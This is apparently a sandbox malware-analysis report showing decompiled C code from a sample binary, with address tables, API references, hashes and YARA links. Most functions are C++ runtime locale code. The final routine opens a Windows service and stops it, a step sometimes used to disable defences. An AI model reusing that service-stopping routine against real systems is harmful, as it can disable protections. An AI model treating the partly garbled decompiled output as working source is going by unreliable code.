					_t280 = _t285;
					_t245 = _v8;
					_push(_t260);
					_t185 = _t192;
					_push(_t247);
					_t193 =  *((intOrPtr*)(_t185 + 0x10));
					_v20 = _t193;
					__eflags = 0x7fffffff - _t193 - _t245;
					if(__eflags < 0) {
						E012F4B30(_t193, __eflags);
						asm("int3");
						_push(8);
						E0132F1B6(0x1368615, __eflags);
						E013177B6( &_v28, 0);
						_t262 =  *0x13aa8d8; // 0x0
						_v12 = _v12 & 0x00000000;
						_v24 = _t262;
						_t248 = E012F9A10(_v0, E012F9850(0x13aa8c4));
						__eflags = _t248;
						if(_t248 != 0) {
							L17:
							E0131780E( &_v28);
							return E0132F190(_t248, __eflags);
						} else {
							__eflags = _t262;
							if(__eflags == 0) {
								_push(_v0);
								_push( &_v24);
								__eflags = E01318C0E(_t262, __eflags) - 0xffffffff;
								if(__eflags == 0) {
									E012F9060();
									asm("int3");
									_push(8);
									E0132F1B6(0x1368615, __eflags);
									E013177B6( &_v28, 0);
									_t263 =  *0x13aa8c8; // 0x0
									_v12 = _v12 & 0x00000000;
									_v24 = _t263;
									_t249 = E012F9A10(_v0, E012F9850(0x13aa890));
									__eflags = _t249;
									if(_t249 != 0) {
										L24:
										E0131780E( &_v28);
										return E0132F190(_t249, __eflags);
									} else {
										__eflags = _t263;
										if(__eflags == 0) {
											_push(_v0);
											_push( &_v24);
											__eflags = E01318C76(__eflags) - 0xffffffff;
											if(__eflags == 0) {
												E012F9060();
												asm("int3");
												_push(8);
												E0132F1B6(0x1368615, __eflags);
												E013177B6( &_v28, 0);
												_t264 =  *0x13aa8cc; // 0x0
												_v12 = _v12 & 0x00000000;
												_v24 = _t264;
												_t250 = E012F9A10(_v0, E012F9850(0x13aa8b8));
												__eflags = _t250;
												if(_t250 != 0) {
													L31:
													E0131780E( &_v28);
													return E0132F190(_t250, __eflags);
												} else {
													__eflags = _t264;
													if(__eflags == 0) {
														_push(_v0);
														_push( &_v24);
														__eflags = E01318CDC(_t264, __eflags) - 0xffffffff;
														if(__eflags == 0) {
															E012F9060();
															asm("int3");
															_push(8);
															E0132F1B6(0x1368615, __eflags);
															E013177B6( &_v28, 0);
															_t265 =  *0x13aa8d0; // 0x0
															_v12 = _v12 & 0x00000000;
															_v24 = _t265;
															_t251 = E012F9A10(_v0, E012F9850(0x13aa8bc));
															__eflags = _t251;
															if(_t251 != 0) {
																L38:
																E0131780E( &_v28);
																return E0132F190(_t251, __eflags);
															} else {
																__eflags = _t265;
																if(__eflags == 0) {
																	_push(_v0);
																	_push( &_v24);
																	__eflags = E01318D44(_t265, __eflags) - 0xffffffff;
																	if(__eflags == 0) {
																		E012F9060();
																		asm("int3");
																		_push(8);
																		E0132F1B6(0x1368615, __eflags);
																		E013177B6( &_v28, 0);
																		_t266 =  *0x13aa8d4; // 0x0
																		_v12 = _v12 & 0x00000000;
																		_v24 = _t266;
																		_t252 = E012F9A10(_v0, E012F9850(0x13aa8c0));
																		__eflags = _t252;
																		if(_t252 != 0) {
																			L45:
																			E0131780E( &_v28);
																			return E0132F190(_t252, __eflags);
																		} else {
																			__eflags = _t266;
																			if(__eflags == 0) {
																				_push(_v0);
																				_push( &_v24);
																				_t147 = E01318DAC(_t266, __eflags, __fp0);
																				_pop(_t223);
																				__eflags = _t147 - 0xffffffff;
																				if(__eflags == 0) {
																					E012F9060();
																					asm("int3");
																					_push(_t280);
																					_push(_t185);
																					_t186 = _t223;
																					_push(_t266);
																					_push(_t252);
																					_v48 = _t186;
																					 *((intOrPtr*)(_t186 + 4)) = _v32;
																					 *_t186 = 0x1375270;
																					E01317C11(_t252, _t266, __eflags, __fp0,  &_v64);
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					asm("movsd");
																					return _t186;
																				} else {
																					_t252 = _v24;
																					_v24 = _t252;
																					_v12 = 1;
																					E0131792B(__eflags, _t252);
																					 *0x1374358();
																					 *((intOrPtr*)( *((intOrPtr*)( *_t252 + 4))))();
																					 *0x13aa8d4 = _t252;
																					goto L45;
																				}
																			} else {
																				_t252 = _t266;
																				goto L45;
																			}
																		}
																	} else {
																		_t251 = _v24;
																		_v24 = _t251;
																		_v12 = 1;
																		E0131792B(__eflags, _t251);
																		 *0x1374358();
																		 *((intOrPtr*)( *((intOrPtr*)( *_t251 + 4))))();
																		 *0x13aa8d0 = _t251;
																		goto L38;
																	}
																} else {
																	_t251 = _t265;
																	goto L38;
																}
															}
														} else {
															_t250 = _v24;
															_v24 = _t250;
															_v12 = 1;
															E0131792B(__eflags, _t250);
															 *0x1374358();
															 *((intOrPtr*)( *((intOrPtr*)( *_t250 + 4))))();
															 *0x13aa8cc = _t250;
															goto L31;
														}
													} else {
														_t250 = _t264;
														goto L31;
													}
												}
											} else {
												_t249 = _v24;
												_v24 = _t249;
												_v12 = 1;
												E0131792B(__eflags, _t249);
												 *0x1374358();
												 *((intOrPtr*)( *((intOrPtr*)( *_t249 + 4))))();
												 *0x13aa8c8 = _t249;
												goto L24;
											}
										} else {
											_t249 = _t263;
											goto L24;
										}
									}
								} else {
									_t248 = _v24;
									_v24 = _t248;
									_v12 = 1;
									E0131792B(__eflags, _t248);
									 *0x1374358();
									 *((intOrPtr*)( *((intOrPtr*)( *_t248 + 4))))();
									 *0x13aa8d8 = _t248;
									goto L17;
								}
							} else {
								_t248 = _t262;
								goto L17;
							}
						}
					} else {
						_t255 = _t193 + _t245;
						_v16 =  *((intOrPtr*)(_t185 + 0x14));
						_t174 = E012F8B30(_t255,  *((intOrPtr*)(_t185 + 0x14)), 0x7fffffff);
						_t11 = _t174 + 1; // 0x1
						_t175 = E012F57D0(_t185, _t245, _t255, _t11);
						 *((intOrPtr*)(_t185 + 0x10)) = _t255;
						_t256 = _v16;
						_v20 = _t175;
						 *((intOrPtr*)(_t185 + 0x14)) = _t174;
						_push(_a16);
						_push(_a12);
						_push(_a8);
						_push(_v12);
						__eflags = _t256 - 0x10;
						if(_t256 < 0x10) {
							_push(_t185);
							_push(_t175);
							E01318778();
						} else {
							_push( *_t185);
							_push(_t175);
							E01318778();
							_push(_t256 + 1);
							E012F56A0(_t185, _t256,  *_t185);
						}
						 *_t185 = _v20;
						return _t185;
					}
				} else {
					if(_t247 != 0) {
						E01345ED0(_t260, _a4, _t247);
					}
					return _t260;
				}
			}

0x0131832a
0x0131832c
0x0131832f
0x01318332
0x01318332
0x01318334
0x01318335
0x0131833d
0x0131833f
0x01318348
0x0131834b
0x0131834e
0x01318367
0x0131836c
0x0131836d
0x0131836e
0x01318373
0x01318377
0x01318378
0x01318381
0x01318382
0x01318387
0x0131838a
0x0131838c
0x013183f9
0x013183fe
0x013183ff
0x01318406
0x01318410
0x01318415
0x01318420
0x01318424
0x01318435
0x01318437
0x01318439
0x0131847e
0x01318481
0x0131848d
0x0131843b
0x0131843b
0x0131843d
0x01318443
0x01318449
0x01318451
0x01318454
0x0131848e
0x01318493
0x01318494
0x0131849b
0x013184a5
0x013184aa
0x013184b5
0x013184b9
0x013184ca
0x013184cc
0x013184ce
0x01318513
0x01318516
0x01318522
0x013184d0
0x013184d0
0x013184d2
0x013184d8
0x013184de
0x013184e6
0x013184e9
0x01318523
0x01318528
0x01318529
0x01318530
0x0131853a
0x0131853f
0x0131854a
0x0131854e
0x0131855f
0x01318561
0x01318563
0x013185a8
0x013185ab
0x013185b7
0x01318565
0x01318565
0x01318567
0x0131856d
0x01318573
0x0131857b
0x0131857e
0x013185b8
0x013185bd
0x013185be
0x013185c5
0x013185cf
0x013185d4
0x013185df
0x013185e3
0x013185f4
0x013185f6
0x013185f8
0x0131863d
0x01318640
0x0131864c
0x013185fa
0x013185fa
0x013185fc
0x01318602
0x01318608
0x01318610
0x01318613
0x0131864d
0x01318652
0x01318653
0x0131865a
0x01318664
0x01318669
0x01318674
0x01318678
0x01318689
0x0131868b
0x0131868d
0x013186d2
0x013186d5
0x013186e1
0x0131868f
0x0131868f
0x01318691
0x01318697
0x0131869d
0x0131869e
0x013186a4
0x013186a5
0x013186a8
0x013186e2
0x013186e7
0x013186e8
0x013186f1
0x013186f2
0x013186f4
0x013186f5
0x013186f6
0x013186f9
0x01318700
0x01318706
0x01318713
0x01318714
0x01318715
0x01318716
0x0131871b
0x013186aa
0x013186aa
0x013186ad
0x013186b1
0x013186b5
0x013186c2
0x013186ca
0x013186cc
0x00000000
0x013186cc
0x01318693
0x01318693
0x00000000
0x01318693
0x01318691
0x01318615
0x01318615
0x01318618
0x0131861c
0x01318620
0x0131862d
0x01318635
0x01318637
0x00000000
0x01318637
0x013185fe
0x013185fe
0x00000000
0x013185fe
0x013185fc
0x01318580
0x01318580
0x01318583
0x01318587
0x0131858b
0x01318598
0x013185a0
0x013185a2
0x00000000
0x013185a2
0x01318569
0x01318569
0x00000000
0x01318569
0x01318567
0x013184eb
0x013184eb
0x013184ee
0x013184f2
0x013184f6
0x01318503
0x0131850b
0x0131850d
0x00000000
0x0131850d
0x013184d4
0x013184d4
0x00000000
0x013184d4
0x013184d2
0x01318456
0x01318456
0x01318459
0x0131845d
0x01318461
0x0131846e
0x01318476
0x01318478
0x00000000
0x01318478
0x0131843f
0x0131843f
0x00000000
0x0131843f
0x0131843d
0x0131838e
0x01318391
0x01318397
0x0131839a
0x013183a1
0x013183a5
0x013183ad
0x013183b0
0x013183b6
0x013183b9
0x013183bc
0x013183bf
0x013183c2
0x013183c5
0x013183c8
0x013183cb
0x013183e4
0x013183e5
0x013183e6
0x013183cd
0x013183cf
0x013183d0
0x013183d1
0x013183d9
0x013183db
0x013183e1
0x013183ef
0x013183f6
0x013183f6
0x01318350
0x01318352
0x01318359
0x0131835e
0x01318366
0x01318366

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 01318367
std::_Lockit::_Lockit.LIBCPMT ref: 01318410
codecvt.LIBCPMT ref: 0131844A
std::_Facet_Register.LIBCPMT ref: 01318461
std::_Lockit::~_Lockit.LIBCPMT ref: 01318481
Concurrency::cancel_current_task.LIBCPMT ref: 0131848E
std::_Lockit::_Lockit.LIBCPMT ref: 013184A5
ctype.LIBCPMT ref: 013184DF

Part of subcall function 01318C76: ctype.LIBCPMT ref: 01318CBD

std::_Facet_Register.LIBCPMT ref: 013184F6
std::_Lockit::~_Lockit.LIBCPMT ref: 01318516
Concurrency::cancel_current_task.LIBCPMT ref: 01318523
std::_Lockit::_Lockit.LIBCPMT ref: 0131853A
std::_Facet_Register.LIBCPMT ref: 0131858B
std::_Lockit::~_Lockit.LIBCPMT ref: 013185AB
Concurrency::cancel_current_task.LIBCPMT ref: 013185B8
std::_Lockit::_Lockit.LIBCPMT ref: 013185CF
std::_Facet_Register.LIBCPMT ref: 01318620
std::_Lockit::~_Lockit.LIBCPMT ref: 01318640
Concurrency::cancel_current_task.LIBCPMT ref: 0131864D
std::_Lockit::_Lockit.LIBCPMT ref: 01318664
numpunct.LIBCPMT ref: 0131869E
std::_Facet_Register.LIBCPMT ref: 013186B5
std::_Lockit::~_Lockit.LIBCPMT ref: 013186D5
Concurrency::cancel_current_task.LIBCPMT ref: 013186E2

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: std::_$Lockit$Concurrency::cancel_current_task$Facet_Lockit::_Lockit::~_Register$ctype$codecvtnumpunct
String ID:
API String ID: 796120328-0
Opcode ID: 32835ac40927b8e4aae635207e403dbbcb9c5341d5d6d1eb13e58d03db48303e
Instruction ID: f877abfb08ec9ec21ff0418f53a69d7650dadb148334b6899a4385d88b30f47c
Opcode Fuzzy Hash: 32835ac40927b8e4aae635207e403dbbcb9c5341d5d6d1eb13e58d03db48303e
Instruction Fuzzy Hash: C6B11A369002169FCF19EF68D844ABEBBB9FF94728F24054CEA14A7384DF349905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0132C87B, Relevance: 28.8, APIs: 19, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0132C87B(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0) {
				signed int _t65;
				signed char _t66;
				void* _t71;
				intOrPtr _t73;
				intOrPtr* _t74;
				void* _t82;
				void* _t85;
				void* _t88;
				intOrPtr* _t91;
				intOrPtr* _t94;
				intOrPtr* _t108;
				intOrPtr _t110;
				signed int _t116;
				void* _t117;
				signed int _t150;
				intOrPtr _t151;
				void* _t153;
				intOrPtr* _t155;
				void* _t156;
				intOrPtr* _t161;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t165;
				void* _t166;
				void* _t167;
				void* _t175;
				void* _t176;
				void* _t177;

				_t195 = __fp0;
				_push(8);
				E0132F1B6(0x1369726, __eflags);
				_push(0);
				_push(0);
				_t65 = E0132B5B7(__edx, __esi, __eflags, __fp0);
				_t116 =  *(_t166 + 0x14);
				_t151 =  *((intOrPtr*)(_t166 + 0x10));
				_t150 = 1 << _t65 >> 1;
				if(( *(_t166 + 0xc) & 1) != 0) {
					_t110 = E012F9850(0x13aaa80);
					_t180 = _t116;
					if(_t116 != 0) {
						_push(_t116);
						E0131A373(__eflags, _t151, E0132B008(_t150, __eflags, __fp0), _t110);
						_t167 = _t167 + 0x10;
					} else {
						 *((intOrPtr*)(_t166 - 0x10)) = _t110;
						_t165 = E0132EA8A(__esi, _t180, 0x10);
						 *((intOrPtr*)(_t166 - 0x14)) = _t165;
						_t181 = _t165;
						if(_t165 == 0) {
							_t165 = 0;
							__eflags = 0;
						} else {
							 *(_t165 + 4) =  *(_t165 + 4) & _t116;
							 *_t165 = 0x1376b54;
							 *((intOrPtr*)(_t165 + 8)) = E01317D7A(_t150, _t181, __fp0);
							 *(_t165 + 0xc) = _t150;
						}
						E0131A373(_t181, _t151, _t165,  *((intOrPtr*)(_t166 - 0x10)));
						_t167 = _t167 + 0xc;
					}
				}
				_t66 =  *(_t166 + 0xc);
				if((_t66 & 0x00000020) != 0) {
					_t163 = E012F9850(0x13aaa84);
					_t183 = _t116;
					if(_t116 != 0) {
						_push(_t116);
						E0131A373(__eflags, _t151, E0132B09D(__eflags, _t195), _t163);
						_t167 = _t167 + 0x10;
					} else {
						_t108 = E0132EA8A(_t163, _t183, 8);
						 *((intOrPtr*)(_t166 - 0x14)) = _t108;
						_t184 = _t108;
						if(_t108 == 0) {
							_t108 = 0;
							__eflags = 0;
						} else {
							 *(_t108 + 4) =  *(_t108 + 4) & _t116;
							 *_t108 = 0x1376b70;
						}
						E0131A373(_t184, _t151, _t108, _t163);
						_t167 = _t167 + 0xc;
					}
					_t66 =  *(_t166 + 0xc);
				}
				if((_t66 & 0x00000004) != 0) {
					_t156 = E012F9850(0x13aaa88);
					_t186 = _t116;
					if(_t116 != 0) {
						_push(_t116);
						E0131A373(__eflags, _t151, E0132B132(__eflags, _t195), _t156);
						_t82 = E012F9850(0x13aaa8c);
						_push(_t116);
						E0131A373(__eflags, _t151, E0132B1C7(__eflags, _t195), _t82);
						_t85 = E012F9850(0x13aaa90);
						_push(_t116);
						E0131A373(__eflags, _t151, E0132B2F1(__eflags, _t195), _t85);
						_t88 = E012F9850(0x13aaa94);
						_push(_t116);
						E0131A373(__eflags, _t151, E0132B25C(__eflags, _t195), _t88);
						_t167 = _t167 + 0x40;
					} else {
						_t91 = E0132EA8A(_t156, _t186, 8);
						 *((intOrPtr*)(_t166 - 0x14)) = _t91;
						_t187 = _t91;
						if(_t91 == 0) {
							_t91 = 0;
							__eflags = 0;
						} else {
							 *(_t91 + 4) =  *(_t91 + 4) & _t116;
							 *_t91 = 0x1376b8c;
						}
						E0131A373(_t187, _t151, _t91, _t156);
						_t175 = _t167 + 0xc;
						_t160 = E012F9850(0x13aaa8c);
						_t94 = E0132EA8A(_t93, _t187, 8);
						 *((intOrPtr*)(_t166 - 0x14)) = _t94;
						_t188 = _t94;
						if(_t94 == 0) {
							_t94 = 0;
							__eflags = 0;
						} else {
							 *(_t94 + 4) =  *(_t94 + 4) & 0x00000000;
							 *_t94 = 0x1376ba4;
						}
						E0131A373(_t188, _t151, _t94, _t160);
						_t176 = _t175 + 0xc;
						 *((intOrPtr*)(_t166 - 0x10)) = E012F9850(0x13aaa90);
						_t161 = E0132EA8A(_t160, _t188, 0x58);
						 *((intOrPtr*)(_t166 - 0x14)) = _t161;
						 *(_t166 - 4) = 7;
						_t189 = _t161;
						if(_t161 == 0) {
							_t161 = 0;
							__eflags = 0;
						} else {
							 *((intOrPtr*)(_t161 + 4)) = 0;
							_push(0);
							_push( *((intOrPtr*)(_t166 + 8)));
							 *(_t166 - 4) = 8;
							 *_t161 = 0x1376bbc;
							 *((char*)(_t161 + 0x28)) = 0;
							E0132C74F(_t161, _t150, _t189, _t195);
							 *_t161 = 0x1376bf0;
						}
						 *(_t166 - 4) =  *(_t166 - 4) | 0xffffffff;
						E0131A373(_t189, _t151, _t161,  *((intOrPtr*)(_t166 - 0x10)));
						_t177 = _t176 + 0xc;
						 *((intOrPtr*)(_t166 - 0x10)) = E012F9850(0x13aaa94);
						_t162 = E0132EA8A(_t161, _t189, 0x58);
						 *((intOrPtr*)(_t166 - 0x14)) = _t162;
						 *(_t166 - 4) = 0xd;
						_t190 = _t162;
						if(_t162 == 0) {
							_t162 = 0;
							__eflags = 0;
						} else {
							 *(_t162 + 4) =  *(_t162 + 4) & 0x00000000;
							_push(0);
							_push( *((intOrPtr*)(_t166 + 8)));
							 *(_t166 - 4) = 0xe;
							 *_t162 = 0x1376bbc;
							 *((char*)(_t162 + 0x28)) = 1;
							E0132C74F(_t162, _t150, _t190, _t195);
							 *_t162 = 0x1376c24;
						}
						 *(_t166 - 4) =  *(_t166 - 4) | 0xffffffff;
						E0131A373(_t190, _t151, _t162,  *((intOrPtr*)(_t166 - 0x10)));
						_t167 = _t177 + 0xc;
					}
					_t66 =  *(_t166 + 0xc);
				}
				if((_t66 & 0x00000010) != 0) {
					_t153 = E012F9850(0x13aaa98);
					_t192 = _t116;
					if(_t116 != 0) {
						_push(_t116);
						E0131A373(__eflags, _t151, E0132B386(__eflags, _t195), _t153);
						_t71 = E012F9850(0x13aaa9c);
						_push(_t116);
						_t66 = E0131A373(__eflags, _t151, E0132B41B(__eflags, _t195), _t71);
					} else {
						_t73 = E0132EA8A(_t153, _t192, 0x44);
						 *((intOrPtr*)(_t166 - 0x14)) = _t73;
						 *(_t166 - 4) = 0x12;
						_t193 = _t73;
						if(_t73 == 0) {
							_t74 = 0;
							__eflags = 0;
						} else {
							_push(_t116);
							_push( *((intOrPtr*)(_t166 + 8)));
							_t74 = E0132B4B0(_t73, _t195);
						}
						 *(_t166 - 4) =  *(_t166 - 4) | 0xffffffff;
						E0131A373(_t193, _t151, _t74, _t153);
						_t117 = E012F9850(0x13aaa9c);
						_t155 = E0132EA8A(_t153, _t193, 0xc);
						 *((intOrPtr*)(_t166 - 0x14)) = _t155;
						_t194 = _t155;
						if(_t155 == 0) {
							_t155 = 0;
							__eflags = 0;
						} else {
							 *(_t155 + 4) =  *(_t155 + 4) & 0x00000000;
							 *_t155 = 0x1376c84;
							 *(_t155 + 8) =  *(_t155 + 8) & 0x00000000;
							E0132C852(_t117, _t150, _t151, _t194,  *((intOrPtr*)(_t166 + 8)));
						}
						_t66 = E0131A373(_t194, _t151, _t155, _t117);
					}
				}
				return E0132F190(_t66, _t194);
			}

0x0132c87b
0x0132c87b
0x0132c882
0x0132c887
0x0132c889
0x0132c88b
0x0132c890
0x0132c895
0x0132c89f
0x0132c8a4
0x0132c8ab
0x0132c8b0
0x0132c8b2
0x0132c8ef
0x0132c8fa
0x0132c8ff
0x0132c8b4
0x0132c8b6
0x0132c8be
0x0132c8c0
0x0132c8c4
0x0132c8c6
0x0132c8de
0x0132c8de
0x0132c8c8
0x0132c8c8
0x0132c8cb
0x0132c8d6
0x0132c8d9
0x0132c8d9
0x0132c8e5
0x0132c8ea
0x0132c8ea
0x0132c8b2
0x0132c902
0x0132c907
0x0132c913
0x0132c915
0x0132c917
0x0132c942
0x0132c94b
0x0132c950
0x0132c919
0x0132c91b
0x0132c920
0x0132c924
0x0132c926
0x0132c933
0x0132c933
0x0132c928
0x0132c928
0x0132c92b
0x0132c92b
0x0132c938
0x0132c93d
0x0132c93d
0x0132c953
0x0132c953
0x0132c958
0x0132c968
0x0132c96a
0x0132c96c
0x0132ca8a
0x0132ca93
0x0132caa0
0x0132caa5
0x0132cab0
0x0132cabd
0x0132cac2
0x0132cacd
0x0132cada
0x0132cadf
0x0132caea
0x0132caef
0x0132c972
0x0132c974
0x0132c979
0x0132c97d
0x0132c97f
0x0132c98c
0x0132c98c
0x0132c981
0x0132c981
0x0132c984
0x0132c984
0x0132c991
0x0132c996
0x0132c9a5
0x0132c9a7
0x0132c9ac
0x0132c9b0
0x0132c9b2
0x0132c9c0
0x0132c9c0
0x0132c9b4
0x0132c9b4
0x0132c9b8
0x0132c9b8
0x0132c9c5
0x0132c9ca
0x0132c9d9
0x0132c9e1
0x0132c9e4
0x0132c9e7
0x0132c9ee
0x0132c9f0
0x0132ca17
0x0132ca17
0x0132c9f2
0x0132c9f4
0x0132c9f7
0x0132c9f8
0x0132c9fd
0x0132ca01
0x0132ca07
0x0132ca0a
0x0132ca0f
0x0132ca0f
0x0132ca1c
0x0132ca22
0x0132ca27
0x0132ca36
0x0132ca3e
0x0132ca41
0x0132ca44
0x0132ca4b
0x0132ca4d
0x0132ca75
0x0132ca75
0x0132ca4f
0x0132ca4f
0x0132ca53
0x0132ca55
0x0132ca5a
0x0132ca5e
0x0132ca64
0x0132ca68
0x0132ca6d
0x0132ca6d
0x0132ca7a
0x0132ca80
0x0132ca85
0x0132ca85
0x0132caf2
0x0132caf2
0x0132caf7
0x0132cb07
0x0132cb09
0x0132cb0b
0x0132cb87
0x0132cb90
0x0132cb9d
0x0132cba2
0x0132cbad
0x0132cb0d
0x0132cb0f
0x0132cb15
0x0132cb18
0x0132cb1f
0x0132cb21
0x0132cb30
0x0132cb30
0x0132cb23
0x0132cb23
0x0132cb24
0x0132cb29
0x0132cb29
0x0132cb32
0x0132cb39
0x0132cb4d
0x0132cb54
0x0132cb56
0x0132cb5a
0x0132cb5c
0x0132cb78
0x0132cb78
0x0132cb5e
0x0132cb5e
0x0132cb67
0x0132cb6d
0x0132cb71
0x0132cb71
0x0132cb7d
0x0132cb82
0x0132cb0b
0x0132cbba

APIs

collate.LIBCPMT ref: 0132C88B

Part of subcall function 0132B5B7: __EH_prolog3_GS.LIBCMT ref: 0132B5BE
Part of subcall function 0132B5B7: __Getcoll.LIBCPMT ref: 0132B622

__Getcoll.LIBCPMT ref: 0132C8D1
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C8E5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C8FA
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C938
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C94B
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C991
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132C9C5
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CA80
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CA93
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CAB0
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CACD
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CAEA
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CA22

Part of subcall function 012F9850: std::_Lockit::_Lockit.LIBCPMT ref: 012F986D
Part of subcall function 012F9850: std::_Lockit::~_Lockit.LIBCPMT ref: 012F9889

numpunct.LIBCPMT ref: 0132CB29
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CB39
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CB7D
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CB90
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0132CBAD

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$H_prolog3_Lockit::_Lockit::~_collatenumpunct
String ID:
API String ID: 4289308570-0
Opcode ID: f56a09563e5a1fcfe1a0058a9718475acfe303b6b1d753b386d50883c4510ee7
Instruction ID: 8c57863212977964d2d45c681cb4cd0d9257ba2d0de5924b4c2c3e7f7bb4b940
Opcode Fuzzy Hash: f56a09563e5a1fcfe1a0058a9718475acfe303b6b1d753b386d50883c4510ee7
Instruction Fuzzy Hash: B591FCB1D012236BFB25BFBD4C11B7F7AA8EF6267DF00442DE949A7240DA7449048BE1

Uniqueness

Uniqueness Score: -1.00%

Function 012FBC70, Relevance: 19.6, APIs: 13, Instructions: 135
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E012FBC70(void* __ebx, void* __edi, long _a4, long _a8) {
				signed int _v8;
				short* _v12;
				short* _v16;
				signed int _v24;
				intOrPtr _v44;
				struct _SERVICE_STATUS _v48;
				char _v49;
				long _v56;
				void* _v60;
				void* __esi;
				signed int _t37;
				void* _t42;
				struct _SERVICE_STATUS* _t46;
				intOrPtr _t48;
				struct _SERVICE_STATUS* _t53;
				struct _SERVICE_STATUS* _t59;
				void* _t63;
				void* _t66;
				unsigned int _t68;
				long _t69;
				void* _t70;
				void* _t71;
				long _t73;
				signed int _t74;

				_t70 = __edi;
				_t37 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t37 ^ _t74;
				_t63 = GetTickCount;
				_t73 = _a4;
				_v49 = 0;
				_v56 = GetTickCount();
				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
					_t42 = OpenSCManagerW(0, 0, 0xf003f);
					_v60 = _t42;
					if(_t42 != 0) {
						if( *((intOrPtr*)(_t73 + 0x14)) >= 8) {
							_t73 =  *_t73;
						}
						_push(_t70);
						_t71 = OpenServiceW(_t42, _t73, 0x2c);
						if(_t71 != 0) {
							_v16 = 0;
							_t46 =  &_v48;
							_v12 = 0;
							asm("xorps xmm0, xmm0");
							asm("movups [ebp-0x2c], xmm0");
							asm("movups [ebp-0x1c], xmm0");
							__imp__QueryServiceStatusEx(_t71, 0, _t46, 0x24,  &_v12);
							if(_t46 != 0) {
								_t48 = _v44;
								if(_t48 != 1) {
									_t73 = _a8;
									if(_t48 == 3) {
										_t66 = 0x2710;
										while(1) {
											_t68 = 0xcccccccd * _v24 >> 0x20 >> 3;
											if(_t68 >= 0x3e8) {
												_t69 =  >  ? _t66 : _t68;
											} else {
												_t69 = 0x3e8;
											}
											Sleep(_t69);
											_t59 =  &_v48;
											__imp__QueryServiceStatusEx(_t71, 0, _t59, 0x24,  &_v12);
											if(_t59 == 0 || _v44 == 1 || GetTickCount() - _v56 > _t73) {
												goto L16;
											}
											_t66 = 0x2710;
											if(_v44 == 3) {
												continue;
											}
											goto L16;
										}
									}
									L16:
									E012FBEE0(_t63, _t71, _v60, _t71, _t73);
									if(ControlService(_t71, 1,  &_v48) != 0 && _v44 != 1) {
										do {
											Sleep(_t73);
											_t53 =  &_v48;
											__imp__QueryServiceStatusEx(_t71, 0, _t53, 0x24,  &_v12);
											if(_t53 == 0) {
												goto L22;
											} else {
												if(_v44 == 1) {
													_v49 = 1;
												} else {
													if(GetTickCount() - _v56 <= _t73) {
														goto L22;
													}
												}
											}
											goto L25;
											L22:
										} while (_v44 != 1);
									}
								}
							}
							L25:
							CloseServiceHandle(_t71);
						}
						CloseServiceHandle(_v60);
					}
				}
				return E0132EA79(_v8 ^ _t74, _t73);
			}

0x012fbc70
0x012fbc76
0x012fbc7d
0x012fbc81
0x012fbc88
0x012fbc8b
0x012fbc95
0x012fbc98
0x012fbca7
0x012fbcad
0x012fbcb2
0x012fbcbc
0x012fbcbe
0x012fbcbe
0x012fbcc0
0x012fbccb
0x012fbccf
0x012fbcd8
0x012fbce2
0x012fbce5
0x012fbced
0x012fbcf3
0x012fbcf7
0x012fbcfb
0x012fbd03
0x012fbd09
0x012fbd0f
0x012fbd15
0x012fbd1b
0x012fbd1d
0x012fbd22
0x012fbd2a
0x012fbd33
0x012fbd42
0x012fbd35
0x012fbd35
0x012fbd35
0x012fbd46
0x012fbd52
0x012fbd59
0x012fbd61
0x00000000
0x00000000
0x012fbd76
0x012fbd7b
0x00000000
0x00000000
